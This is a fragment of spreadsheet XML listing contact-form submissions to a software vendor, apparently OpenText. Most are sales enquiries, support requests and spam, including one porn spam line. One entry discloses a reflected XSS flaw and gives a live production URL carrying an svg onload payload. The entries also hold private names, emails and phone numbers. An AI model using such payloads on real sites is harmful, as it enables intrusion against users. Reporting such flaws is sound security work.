Детские вшедские стенки Шведскаястенкадлядетей  Швескаястенкадлядетей. Высота комплекса: 2,20 м Занимаемая площадь: 0,95 х 0,65 м (1 м) Максимальная нагрузка: 100 кг Длина перекладин Детский напольный комплекс еВ</t>
  </si>
  <si>
    <t>Need to discuss a new fax solution with 15,000 users</t>
  </si>
  <si>
    <t>I need a quote to renew support for Redactit based on contract #0012270958</t>
  </si>
  <si>
    <t xml:space="preserve">It would seem there is a problem with the installation of Windows 10 update 1709 and OpenText Host Explorer.  There is an endless loop looking for the .msi file during this OS update. </t>
  </si>
  <si>
    <t>Do you have a network license version of Brava Desktop.  Currently we have to install each license with it's own number and it is very cumbersome. Thinking of quitting our maintenance in favor of something easier to install and maintain.</t>
  </si>
  <si>
    <t>Try to download xCP Designer 2.2 latest patch, got error_x000D_
Web Server Error_x000D_
Search_x000D_
Site Map_x000D_
_x000D_
_x000D_
Please help</t>
  </si>
  <si>
    <t>Need information on OpenText Capture</t>
  </si>
  <si>
    <t>We would like to enable E-Faxing within our NextGen EHR, though we have questions regarding a BAA or agreements.  Please contact me to discuss.</t>
  </si>
  <si>
    <t xml:space="preserve">Ricoh Fax Integration. Questions about what embedded app to use. See you have one listed on your website, is this sold through yall or ricoh? We have a large county school system that is looking to more to rightfax if the embedded option is a viable one. Thanks in advance. </t>
  </si>
  <si>
    <t>Would like to understand more about the product.</t>
  </si>
  <si>
    <t>Fuydhidf</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are currently using Hummingbird BI Query v8.5 which we think dates from about 2004 and runs on Windows XP.  _x000D_
_x000D_
As I understand it, Hummingbird was taken over by OpenText? You now produce a BI Query tool which sounds like a much more modern version of what we have: https://www.opentext.com/what-we-do/products/specialty-technologies/business-intelligence  _x000D_
_x000D_
Could you advise much licences are and if you would be able to provide a trial licence?_x000D_
_x000D_
Thanks _x000D_
Michael Rogers</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking to speak with a sales person to understand OpenText product offering for Transaction Banking solutions to facilitate C2B payments._x000D_
_x000D_
Kind Regards</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to share few details regarding Cloud Business VOIP services for your knd review_x000D_
_x000D_
Premium Business Features:_x000D_
1.Unlimited calling to USA and Canada _x000D_
2.You can Keep Call Forward to Inida mobiles as well_x000D_
3.Call recording's downloading facility _x000D_
4.Conference Bridging(Join Unlimited People)_x000D_
_x000D_
Benefits:_x000D_
1:24/7 Tech Support in USA and India _x000D_
2:we assure you with 99.99% up time _x000D_
3:There is no contract with our service _x000D_
For Assistance you can reach me on 732-444-3132 Ext 124 or via Email: abdul.rahman@vitelglobal.com _x000D_
Website: https://www.vitelglobal.com/features_x000D_
_x000D_
If Ur interested Please contact me on the above details </t>
  </si>
  <si>
    <t>Request contact person to discuss procuring training materials for Content Server System Administration</t>
  </si>
  <si>
    <t>Sehr geehrter Damen und Herren,_x000D_
_x000D_
auch in diesem Jahr findet unsere in Fachkreisen inzwischen sehr beliebte Lean EAM Konferenz statt. Am 07. November 2018 werden zu dem Motto »EAM - Erfolgsfaktor für Digitalisierung« wieder einige hervorragende Referenten mit mannigfaltigen Fachbeiträgen aus der Praxis und der Wissenschaft erwartet._x000D_
_x000D_
Lassen Sie sich nicht die Chance entgehen und werden Sie Teil dieser Konferenz! Wir laden Sie sehr herzlich als Aussteller zu unserer Lean EAM Konferenz am 07. November in München ein._x000D_
_x000D_
Wir erwarten wie letztes Jahr etwa 140 Teilnehmer aus führenden Unternehmen - aus dem DAX bis zum Mittelstand. Als Referenten haben sich bereits unter anderem Herr Markus Rauert (adidas AG), Herr Erik Odenwald (fenaco Genossenschaft), Herr Prof. Dr. Aier (Universität St. Gallen) und Herr Dr. Piwetz (E.ON Business Services GmbH) angekündigt: https://www.lean-konferenz.de/lean-eam-konferenz-2018/referenten._x000D_
_x000D_
Detaillierte Informationen und Inhalte zu unseren vergangenen Veranstaltung finden Sie auf unserer neuen Lean Konferenz Homepage: https://www.lean-konferenz.de/. Unter jeweils der entsprechenden Konferenz können Sie weitere Inhalte im Seitenmenü auswählen. Unter https://www.lean-konferenz.de/bildergalerien finden Sie eine Auswahl an Bildern der vorherigen Konferenzen._x000D_
_x000D_
Wir sind überzeugt Ihnen ein herausragendes Publikum bieten zu können, und würden uns sehr freuen Open Text Software GmbH als Aussteller begrüßen zu dürfen. Der multifunktionale Ausstellungsraum ist der zentrale Mittelpunkt, und dient nicht nur als Pausenfläche und Zugangsraum zur Konferenz. Neben den Kaffeepausen, dem Mittagessen und den World-Cafés dient der Raum vor allem für Sie als Aussteller als profitabler Ort des Netzwerkens durch Gespräche und Austausch mit den fachkundigen Konferenzteilnehmern._x000D_
_x000D_
Sie können dabei zwischen den zwei Ausstellerpaketen Standard und Premium wählen. Beim Premium-Aussteller ist u.a. ein Vortrag im Hauptprogramm vorgesehen und eine gesonderte</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested in acquiring database of "Cyber Security and Digital Forensics Industry Professionals Database" with top level decision makers for your upcoming marketing campaigns or sales growth? _x000D_
 _x000D_
List Include: _x000D_
C suite level professionals, Security solution managers, Strategists Analysts, Security infrastructure managers, Product managers, Corporate network security professionals, Federal, state and local law enforcement digital forensic specialists, Corporate and private forensic examiners, Network Engineers &amp; Security Architects and more.._x000D_
_x000D_
If your target audience is not mentioned above, kindly let me know._x000D_
 _x000D_
Target Industry: _x000D_
Target Geography: _x000D_
Target Job Title:_x000D_
 _x000D_
Few Samples:  Please let me know your exact target audience you wish to reach, so that I can fetch you some samples records, this will help you analyze the quality of our services._x000D_
_x000D_
Looking forward to hear from you _x000D_
 _x000D_
Regards,_x000D_
Julia  Amo|Business Development coordinator_x000D_
 _x000D_
_x000D_
Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I stopped by your booth at LegalTech and am interested in learning more about your offerings with regard to e-discovery services. I am specifically interested in your offerings with regard to:_x000D_
_x000D_
•	Data collections and pricing, and the ability to search and cull data during collections_x000D_
•	Non-Relativity discovery review options and pricing for same_x000D_
_x000D_
Look forward to hearing from you. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>slightly confused by the title - "Open"_x000D_
What is open about this?_x000D_
It's not open-source and it doesn't have a community edition?_x000D_
It's not driven by an open-source project ?_x000D_
Please confirm the above assumptions .. thanks_x000D_
Jim</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi,_x000D_
_x000D_
Would you be interested in acquiring our updated list of WebSmart Users?_x000D_
_x000D_
There are 21,411 WebSmart Users  and all these records come with detailed business contact information like company name, contact name, LinkedIn profile, company URL, physical address, phone number, fax number, number of employees, revenue size, SIC Code and industry classification. The data will be completely verified prior to delivery and you will get all live and accurate contacts ready to use._x000D_
_x000D_
Please review the same and let me know your thoughts. Your responses is highly apperciated._x000D_
_x000D_
Regards,_x000D_
Sonia White_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">request quote for OpenText Exceed 15 </t>
  </si>
  <si>
    <t>I want to know if you have a tool to convert NFSV4 ACLs from UNIX to Windows using SAMBA or any other tools. This is very urgent and critical. We don't mind buying the tool if you have one.</t>
  </si>
  <si>
    <t>All Exceed installation have trouble With windows10 OS. Is it possible to Upgrade from 14 to latest OpenText Version so it will support windows10? Or maybe any other avialable updates?_x000D_
_x000D_
/Geir</t>
  </si>
  <si>
    <t>Je vous prie de bien vouloir m’adresser un devis concernant l’acquisition d’une solution de traitement de fax intégrée à la messagerie Lotus Notes version 9.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have 2,123  Xendesktop Customers from  Germany._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am not receiving the notification verification email for My Support.  The Public Service Commission has a support contract for Exceed and I need to be able to access the support site for access to downloads and documentation.  Thank you.</t>
  </si>
  <si>
    <t>"Re: Google Manual Action Penalties&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;Hello!&lt;br&gt;&lt;br&gt;&lt;br&gt;Hope you are doing well.&lt;br&gt;&lt;br&gt;&lt;br&gt;I discovered some major issues on your website which might be the cause of the Google Penalties and poor search rankings of your website: &lt;br&gt;&lt;br&gt;* Your site has different adverse technical errors such as dead links, HTML errors, missing image alt tags, etc. You can verify this by searching your website URL on validator.w3.org, brokenlinkcheck.com, feedthebot.com/tools/alt/&lt;br&gt;&lt;br&gt;* I found that there are various 'bad' links pointing to your website. You can confirm this by searching your site for the key search engines search boxes - Google, Yahoo &amp; Bing. Just search by entering your website:  URL.&lt;br&gt;&lt;br&gt;* The number of quality or commanding Backlinks related to your website is very low. You can confirm this by just visiting ahrefs.com&lt;br&gt;&lt;br&gt;* Duplicity in the contents has been found which can be negatively affecting your website search rankings. You can directly verify this at copyscape.com. &lt;br&gt;&lt;br&gt;We can help you fix these problems and get your website ranking on the top page of Google, Yahoo &amp; Bing!&lt;br&gt;&lt;br&gt;We can help you develop the visibility of your website in all major Search Engines to increase website traffic, sales and popularity in the target area. &lt;br&gt;If you are interested in receiving affordable Search Engine Optimization (SEO/SMO/SEM) done for your website, just email us back and get a full affordable SEO proposal.&lt;br&gt;&lt;br&gt;Best Regards, &lt;br&gt;Joe Root&lt;br&gt;Rootjoe301@gmail.com"</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am testing our new Capture webpage and I would like to ask, to whom Sales and general inquiries (which are received by email) about the topic Capture are forwarded to ?_x000D_
Thanks for your feedback._x000D_
_x000D_
Guenther Grabow_x000D_
Product Manager | Capture OEM/VAR Products_x000D_
Open Text Document Technologies GmbH _x000D_
_x000D_
Max-Stromeyer Strasse 116_x000D_
78467 Konstanz_x000D_
Germany_x000D_
_x000D_
Phone:  +49 (0) 7531 874860_x000D_
Mobile: +49 (0) 175 7257200_x000D_
Fax:        + 49(0) 7531 875860_x000D_
_x000D_
Email: ggrabow@opentext.com_x000D_
Web:  http://www.opentext.com_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Brava! Reader Lisans almak istiyorum.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I discovered from a colleague that you made an EDI to Accredo connector for the company he was working for._x000D_
We are a supplier of Progressive Enterprises and we would like to ask you a quotation for the above product._x000D_
_x000D_
Kind regards._x000D_
</t>
  </si>
  <si>
    <t>NMSA is Papua New Guinea's maritime safety authority, urgently looking for incident management information system designed specifically for Maritime Authority Operations</t>
  </si>
  <si>
    <t>Unable to access support site</t>
  </si>
  <si>
    <t xml:space="preserve">Hi sir, I contact you since 4 days to know about the price licence but till now, i received no answer. _x000D_
Please can you quickly answer my question? </t>
  </si>
  <si>
    <t xml:space="preserve"> Recent available porn place  _x000D_
http://sextoys.porndairy.in/?trista _x000D_
  erotic cakes erotic romance publishers victorian erotic photography erotic mens underwear child erotic</t>
  </si>
  <si>
    <t>Potential Virus threat in my calendar.  Late last evening I noticed an entry for Feb 7th; this was not entered by me.  It is a birthday reminder from a former OT employee who left OT over 2 years ago.  Can someone tell me what to do with this potential problem?  703-334-1499 in USA</t>
  </si>
  <si>
    <t>Have some old Lasmo oil shares from around 2002 I think was just wondering who can I contact to see if there are worth anything,_x000D_
Thanks,_x000D_
Vincent Brennan.</t>
  </si>
  <si>
    <t>I HAVE USED BRAVA READER SOLEY TO MEASURE AREAS - AND DIMENSIONS ON CONSTRUCTION DRAWINGS. CAN YOU ADVISE ON WHICH PACKAGE I NEED TO BUY</t>
  </si>
  <si>
    <t>Kindly patch the following xss vulnerability..._x000D_
_x000D_
URL_x000D_
https://tatproddel105.tat.cloud.opentext.com/v/index.jsp?vgnextoid=d13cd68cb21f0510VgnVCM100000164d8d0aRCRD&amp;vgnextfmt=default&amp;vgnextlocale=xss%22%3E%3Csvg/onload=prompt(/xss/)%3E_x000D_
_x000D_
_x000D_
Thanks..;)_x000D_
_x000D_
Kindly reply to my email_x000D_
_x000D_
Devansh</t>
  </si>
  <si>
    <t>Request for Prices *Urgent*_x000D_
Need support or at least distributor contact. Thank you.</t>
  </si>
  <si>
    <t>Require your implementation partner contact details at Saudi Arabia</t>
  </si>
  <si>
    <t>Upgrade RightFax enterprise fax manager to latest version.</t>
  </si>
  <si>
    <t xml:space="preserve">Hy the reason to contact you My Municipality have allocated for us a Side to start working in to Recycling_x000D_
_x000D_
And open opportunities for unemployment people the way things it is, I really don't no where can I start _x000D_
_x000D_
Building the site _x000D_
Working equipment_x000D_
To pay the employers_x000D_
Transport_x000D_
_x000D_
We are the member of PETCO will offering a Uniform and Safety._x000D_
_x000D_
But the site that they gives us it need money as well please contact us will appreciate your call._x000D_
_x000D_
Thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Земельные и кадастровые работы в Краснодаре и г. Армавир. _x000D_
Решение любого вопроса по Краевому БТИ. Под КЛЮЧ. _x000D_
-------------------------------- _x000D_
[url=https://goo.gl/B8eSZm#8V1gPPWxuQ]краснодарское бти краснодар[/url]_x000D_
[url=http://bit.ly/2rJUgga#E73CsqsB1e]симферопольская 9 краснодар бти[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
I am student pursuing Master's and need to know about Open Text VIM certification._x000D_
Are there any pre-requisites for the certifications and if there are any student discounts._x000D_
If a call can be scheduled for the same._x000D_
Kindly let me know about the same.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I came across your website and there is so much potential into it but you need to level up your game._x000D_
Your competitors are ranking page one with SAPE links. I know this for a fact as many of them buy the links from me._x000D_
_x000D_
If you want to rank like them, get SAPE links from my website:_x000D_
_x000D_
https://authoritylinkbuilding.com/sape-links/english-sape/ - 25% bonus links_x000D_
https://authoritylinkbuilding.com/sape-links/home-page-sape/_x000D_
_x000D_
If you have any questions, please let me know._x000D_
_x000D_
Best regards,_x000D_
Kal</t>
  </si>
  <si>
    <t>dear team I would like to get right email address and contact person whom I can address our global merck manuals request for proposal in area of digital asset management thank you</t>
  </si>
  <si>
    <t>We are looking for information on potential document management solutions for a small law firm.</t>
  </si>
  <si>
    <t>I am integrating the RightFax service to our application but I couldn't make it work. It is always throwing an error that I am not authenticated. Even though I'm supplying the right password. Here is the link that I'm using for your service _x000D_
http://rfapi.yorkrsg.com/RightFaxWCFService_1.3/rightfaxservice.svc_x000D_
Is there something that I still need in order to connect successfully? I'm simply trying to issue a Connect() request and hoping it return successfully.</t>
  </si>
  <si>
    <t>We need ECM solution for one of our hospital client._x000D_
Can your sales team get in touch with us?</t>
  </si>
  <si>
    <t xml:space="preserve">For employment in your company any location. </t>
  </si>
  <si>
    <t>Open TXT OCR Technology integration with one content system</t>
  </si>
  <si>
    <t>Want to use OpenText Analytics</t>
  </si>
  <si>
    <t>How much is a good website worth to you?_x000D_
_x000D_
 _x000D_
_x000D_
Suppose you could employ the services of an outstanding website that had the ability to communicate the ‘real’ value of your services or products. Imagine what it would be like having a brilliant website that you could rely on to get the job done to a really high standard so that clients and potential new contacts wanted to engage with you even more._x000D_
_x000D_
 _x000D_
_x000D_
Sound Too Good To Be True?_x000D_
_x000D_
 _x000D_
_x000D_
Well, it isn’t if you had the right website. You see, pound for pound, nothing provides a better return on investment than a good website. To illustrate, think about someone who goes fishing but doesn’t actually care about what kind of fish he’s trying to catch. Not only that, but he doesn’t even take into account the environment and fails to notice what the fish are feeding on. Do you think he’ll catch much?_x000D_
_x000D_
 _x000D_
_x000D_
Exactly the opposite is true with a good fisherman. You see, a good fisherman takes into account the target fish and what it’s currently feeding on. Also, he’ll study the environment and choose his bait wisely. When he casts, it’ll be straight and present the bait to the fish in an enticing way. This will give him a much better chance of hooking and landing a big fish . . . regularly._x000D_
_x000D_
 _x000D_
_x000D_
So it is with a good Website. It’s probably one of the most powerful tools a company could ever hope to have. It will consistently deliver for you, grabbing the attention of an audience and educating them along the way. When a potential client or customer stays longer on your website, you know it’s been a good days fishing!_x000D_
_x000D_
 _x000D_
_x000D_
But Finding a person to create that kind of site is the hard part._x000D_
_x000D_
 _x000D_
_x000D_
It could take you months and cost a small fortune trying to search for and pick the right Website designer. But instead of knocking yourself out trying to find them, STOP! Because you’ve found a hard working, reliable Website designer right now, ready to help you go ‘fishing’. In a matter of weeks you’ll be able to sit back and</t>
  </si>
  <si>
    <t>I'm trying to confirm our support contract and what is included as OpenText is now supporting our products.  Right now I need access to whatever support resources we have contracted, also I need to be able to download software, thank you!</t>
  </si>
  <si>
    <t>What training is available for Team Developer, specifically SQL Windows?</t>
  </si>
  <si>
    <t>Very angry with your company. Why do you put free DWG vierwer on the web and then you cant open any drawing unless you have an update. Obviously the update is impossible to fin in your web page and probably not free. What do you have to say?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to acquire email list of “Radiologist” from your target region?_x000D_
 _x000D_
To name few:    _x000D_
               • 1.5Million+ Healthcare professionals’ (Doctors, Physicians, Surgeons, Nurses etc..)_x000D_
               • 200,000+ Hospital executives’ contacts(Administration, Architects, Interior Designers, Facilities, Supply Chain etc.,.)_x000D_
               • 30,000+ Top Level Decision Makers from Home Health, Hospice and Long Term care centers etc.,_x000D_
_x000D_
Note: We also provide Email Appending solution with guaranteed deliverable email addresses._x000D_
_x000D_
Look forward to hear back from you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bert Connell </t>
  </si>
  <si>
    <t>Understand product offering for C2B payments processing</t>
  </si>
  <si>
    <t>Can you provide a resource/contact person for us to reach out to who has specific knowledge of Credit Union solutions for ECM (ApplicationXtender) ? Please email me if possible. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to speak to someone about setting a UPC catalog.  </t>
  </si>
  <si>
    <t xml:space="preserve">We are currently in the process of exploring our options for DAM services.  I was wondering if you had a pricing sheet that you can share with us? I know it would fluctuate pending the products we will need but we are trying to get an understanding of cost ranges.   </t>
  </si>
  <si>
    <t>Looking for a fax server solution to integrate with CUCM 10.5 and Cisco Unity Connection 10.5</t>
  </si>
  <si>
    <t xml:space="preserve">Olá,_x000D_
Sou do time de Learning na IBM Brasil, e estamos precisando treinar alguns profissionais nos seguintes módulos :_x000D_
_x000D_
1) VIM_x000D_
2) ICC_x000D_
3) Archiving_x000D_
4) OCR_x000D_
_x000D_
Quais os cursos de vocês para suportar esses módulos ?_x000D_
_x000D_
Precisamos saber, data , valor e localidade. _x000D_
_x000D_
Há um contato no Brasil para conversarmos ?_x000D_
_x000D_
Fico no aguardo._x000D_
_x000D_
Renata Coelho_x000D_
Learning &amp; Knowledge GTS_x000D_
IBM Brasil_x000D_
</t>
  </si>
  <si>
    <t>I need a renewal quote for my customer.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to figure out how to open the protected PDF docs. </t>
  </si>
  <si>
    <t>Would like to update or version of exceed on demand. We would like to test the latest and greatest stable build. Please provide information on where i could download for install using our current license.</t>
  </si>
  <si>
    <t>We currently have SharePoint 2010.  We are looking to replace it with an Enterprise Content Management system.  Can we see a demo of OpenText's ecm?</t>
  </si>
  <si>
    <t xml:space="preserve">I am seeking software make a large pdf repository text searchable. It is on a network share. Please contact me for demo/ trial. </t>
  </si>
  <si>
    <t>Now that OpenText has purchased the Document Sciences products we would like some info. We are long time users of the Doc Sciences xPression product and have version 4.5 installed. What are the current support timeframes for this version and what is the latest version offered? Also we use the standalone Compuset product (on Solaris). There is no info on this on your web site. What are the supported versions for this?</t>
  </si>
  <si>
    <t>Please enable My Support . I have already completed the verification process.</t>
  </si>
  <si>
    <t>Information on Customer Experience Management (CEM) to see how it could compliment Aetna's OpenText Exstream environment.</t>
  </si>
  <si>
    <t xml:space="preserve">My login gwait@wilmingtontrust.com does not allow me to the support areas receiving the message:_x000D_
Online Support services are available to customers with active support contracts only. _x000D_
Here is our information:_x000D_
Contract Number	WIL01_x000D_
Expires 3/14/18_x000D_
EU0309379	Wilmington Trust Corporation_x000D_
_x000D_
Can someone correct my login (gwait@wilmingtontrust.com) so I can open tickets, find documentation, get downloads? My access should be the same as jmcallister@wilmingtontrust.com . _x000D_
Thank you,_x000D_
Georgette Wait_x000D_
Wilmington Trust Corporation_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring our updated list of CEA Software users?_x000D_
_x000D_
There are 5280 CEA Software users and all these records come with detailed business contact information like company name, contact name, LinkedIn profile, company URL, physical address, phone number, fax number, number of employees, revenue size, SIC Code and industry classification. The data will be completely verified prior to delivery and you will get all live and accurate contacts ready to use._x000D_
_x000D_
Please review the same and let me know your thoughts. Your responses is highly apperciated._x000D_
_x000D_
Regards,_x000D_
Sonia White_x000D_
</t>
  </si>
  <si>
    <t>Unable to access support site, we used to have access with EMC Documentum. support site</t>
  </si>
  <si>
    <t>Travelopia own 50 travel brands, and are looking to standardise customer journeys and customer documentation to ensure branding and style compliance. Individual brands must retain control over design and content of their customer communications._x000D_
_x000D_
Any solution must integrate with our existing reservation, CMS and CRM systems and allow creation, customisation, management, distribution and archival of customer documentation._x000D_
_x000D_
Documentation is multi-channel, including SMS, email, web, mobile and print, and we need the ability to send both batch and on-demand comms.</t>
  </si>
  <si>
    <t>We are looking for partners for Intelligence Soft (www.intsoft.spb.ru), which is a Russia based software outsourcing services provider._x000D_
_x000D_
Intelligence Soft gives quality software outsourcing services for Microsoft environment (.NET, Azure , etc.) and Mobile application development._x000D_
_x000D_
As partners, we are looking for software developers, which will be utlizing Intelligence Soft resources in the development of their products/projects. We identified OpenText as a potential partner._x000D_
_x000D_
Please get back to me for more information/further discussion, if you are interested in a partnership.</t>
  </si>
  <si>
    <t>We have a support contract and I would like to have access to Support documentation please via My Support. My account does not appear to have this access.</t>
  </si>
  <si>
    <t xml:space="preserve">I met Mark Morley at a conference yesterday, and I've misplaced his business card.  Can you send me his contact details so I can stay connected? Thanks_x000D_
_x000D_
Paul_x000D_
</t>
  </si>
  <si>
    <t>Dear Sales team,_x000D_
_x000D_
We are the Swiss branch of a Consulting firm in Asset Management. We are helping our clients in redefining their organisation and supporting them in their transformation on all sides of their activities. Portfolio management is a key area we cover and thus we would be very interested in having a presentation and/or a demo of your solution as it seems it might be a potential good fit for some of our clients._x000D_
_x000D_
Would you have to travel to Geneva we would be happy to meet in person._x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Could you grant me access to the support pages. _x000D_
Timo van der Zande asked me to open an account at opentext if my former account (sogeti) is not active anymore. </t>
  </si>
  <si>
    <t>no response on application for talent acquisition &amp; HRBP job so far  (I have 14+yrs exp worked in oracle ,microsft,wipro companies ), rachna 7330644376</t>
  </si>
  <si>
    <t xml:space="preserve">Do you bother to read your own content?  Posting a free download on the 7 key concepts of GDPR in a manner that is as non-compliant with GDPR as one can get fundamentally undermine syour organisations credibility.  No privacy notice (illegal collection of data under current EU data protection laws), no purpose notification, excess collection of personal data in breach of data minimisation principles, no indication of how I can exercise my rights or how long you will keep that data.  Shame your own organisation is totally unfamiliar with these concepts.  </t>
  </si>
  <si>
    <t>Open Text, Philippines_x000D_
HR Department / Employee Engagement _x000D_
_x000D_
Greetings from Mindworks! 😀 _x000D_
_x000D_
We understand how  stress, poor health and lack of focus can lose productivity among employees, workers, service industry workers, corporate executives or call center agents. The grueling hours, irate customers, traffic, work related pressure, poor eating habits and lack of focus and motivation are  just some examples of corporate reality._x000D_
_x000D_
Our company, Mindworks Center for Mind Health, is offering a  Wellness and stress management workshop/seminar that can help employees. service workers, staff, call center executives and agents to live a healthy, stress free and productive lifestyle.  This will be facilitated by  Ms. Denise Celdran, a  life coach, wellness expert and teacher for The Art of Living Philippines  Also, our rates are very reasonable. :)_x000D_
_x000D_
We have conducted numerous seminars for different  establishments such as various companies, hotels, Special needs schools, Drug Rehabilitation  centers and various Call Centers -BPO Companies. To name a few a companies we had seminars with, Leechiu, Malayan Insurance, Dunkin Donuts Philippines, Abs-Cbn, Qualimed, The Shangrila Hotels, Philippine Heart Center, SM Corporate Office, Coca-cola Phil., Ingram Micro, East Vantage BPO, Premier BPO, Accenture employees and many more. _x000D_
_x000D_
The topics to be discussed and benefits are as follows:_x000D_
_x000D_
- Introduction to the Mind and its Tendencies_x000D_
- Tools to Manage the Mind_x000D_
- Discussion on Gut Health and connection to Mind Health_x000D_
- Breathing and Meditation Exercises_x000D_
- Stress Management_x000D_
- Build resilient, well behaviors in response to challenging work situations_x000D_
- Harness stress for increased productivity_x000D_
- On the floor roving Chair and standing exercises_x000D_
- Journaling /Goal setting_x000D_
- Promotes Happiness and Well being. (employee retention)_x000D_
- On the floor exercises on cubicles, sitting and Standing_x000D_
- Includes handouts for exercises, free wellness posters_x000D_
- can be a resource s</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there_x000D_
_x000D_
Website: http://www.tosing.vip/_x000D_
Contact Us: info@tosing.vip_x000D_
_x000D_
TOSING Q7S Wireless Karaoke Microphone Bluetooth Speaker 2-in-1 Handheld Sing_x000D_
_x000D_
Product Details:_x000D_
_x000D_
Item Weight: 13.9 ounces_x000D_
Package Dimensions: 12.9 x 6.1 x 3.7 inches_x000D_
Shipping Weight: 1.8 pounds_x000D_
♪ Portable Karaoke Microphones A Handheld Wireless Microphones with a portable mini home KTV for Music Playing and Singing at anytime._x000D_
♪ Remarkably KTV Echo Effect the highest quality chipset with two channel stereo headphones, more stunning KTV live-sound, more clear music rhythm with echo reverberation._x000D_
♪ Multipurpose Bluetooth speaker, KTV singing, Gathering singing, Family singing, Travel singing, Car Stereo, Instrument Recording, Interviews and Live ect. It's a Unique Gift for your Friends or Family._x000D_
♪ Advanced Technology Aluminum-magnesium alloy shell, Professional tuning system,Three-layer high-density noise reduction, Intelligent mixing chip, Intelligent compatible design, Professional audio processor,High-quality dual speakers._x000D_
If you are looking for one of the coolest music gadgets ！ The TOSING bluetooth wireless speaker handheld microphone is your best choice. _x000D_
_x000D_
Why choose TOSING Bluetooth handheld microphone? Make your life more convenient._x000D_
_x000D_
We are the original factory of bluetooth microphone with patent number._x000D_
_x000D_
Portable Karaoke Microphones-- The most convenient Party Supplies, whatever home camping, travel and party, perfect to show your voice._x000D_
Unique International Patent Owners-- The original karaoke microphone have our Own Unique International Patent of our Bluetooth Microphone,_x000D_
All our Karaokes are Official Authentic Products with High Quality._x000D_
Remarkably KTV Echo Effect-- We used the highest quality chipset with two channel stereo headphones, it produces a more stunning KTV live-sound and_x000D_
more clear music rhythm with echo reverberation._x000D_
MultiProtect Safety Battery-- Our MultiProtect Safety Battery could keep you and your devices safely.2600 mAh battery gives </t>
  </si>
  <si>
    <t>please grant access to this site so that i can access knowledge hub.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Can you please let me know if BI Query Admin and User 10.5.1 is Windows 10 compatible? Also, what is the latest version and system requirements for BI Query Admin/User.</t>
  </si>
  <si>
    <t>Вип стоматология. Современное стоматологическое лечение и протезирование зубов на Белорусской. Диагностика с применением микроскопа. Индивидуальный подход, разумные цены [url=http://dentaljazz.ru/services/implantaty-straumann/]имплантат штрауман цена[/url] Центр ортодонтии Улыбнись, м.Алексеевская, Москва - отзыв. Большинство людей боятся стоматологов. Я теперь не боюсь, в том числе с помощью опыта лечения в этой стоматологической клинике -</t>
  </si>
  <si>
    <t>Learn to be certified for admin support. during communication, include mankadn@sec.gov email address as well.</t>
  </si>
  <si>
    <t xml:space="preserve">My account is not working- I hit password reset and I visited the URL to reset my password. _x000D_
 When I try a few times to make different, new passwords, I just get an error saying "An Error Occurred updating password ". </t>
  </si>
  <si>
    <t>I would like more information regarding OpenText ECM Everywhere. Is this an additional module for Content Server? We are currently running version 10.5. If we upgrade to version 16, is the mobility aspect included as Open Text Content server Mobile? Or is it also a module add on?</t>
  </si>
  <si>
    <t>Interested in hearing about RightFax. We use Netsmart Homecare and discovered RightFax can integrate with it.</t>
  </si>
  <si>
    <t>I would like to understand what is available from an EDI platform including managed services.</t>
  </si>
  <si>
    <t>I can no longer access My Support to ask question about TeamSite._x000D_
_x000D_
I was able to access last year, can you help me look into the reason why?_x000D_
_x000D_
Thanks,_x000D_
Robin</t>
  </si>
  <si>
    <t>Datamatics is working on an RFP for one of its customers that is looking for an enterprise DAM solution. _x000D_
_x000D_
Require detailed information on OpenText DAM solution and a point of contact for the RFP process.</t>
  </si>
  <si>
    <t>I need to speak with a manager (account manager, sales, or technical). We are a customer and have been having a lot of issues with OpenText application. We're spending a large amount of time with your support but continues to have issues with rehydrating archived attachment from emails. Please reach out to me as soon as you can so we can discuss how to move forward. Thanks._x000D_
_x000D_
Peter</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi,_x000D_
_x000D_
Would you be interested in acquiring our updated list of Amerisource Bergen Users?_x000D_
_x000D_
There are  Amerisource Bergen Users and all these records come with detailed business contact information like company name, contact name,linkedIn profile, company URL, physical address, phone number, fax number, number of employees, revenue size, SIC Code and industry classification.The data will be completely verified prior to delivery and you will get all live and accurate contacts ready to use._x000D_
_x000D_
Please review the same and let me know your thoughts.Your responses is highly appreciated._x000D_
_x000D_
Thanks and Regards_x000D_
Selina Watson_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to place a online order and not sure where to go it does not have any place that says place a order._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam, _x000D_
We are planning a project to renovate our public websites._x000D_
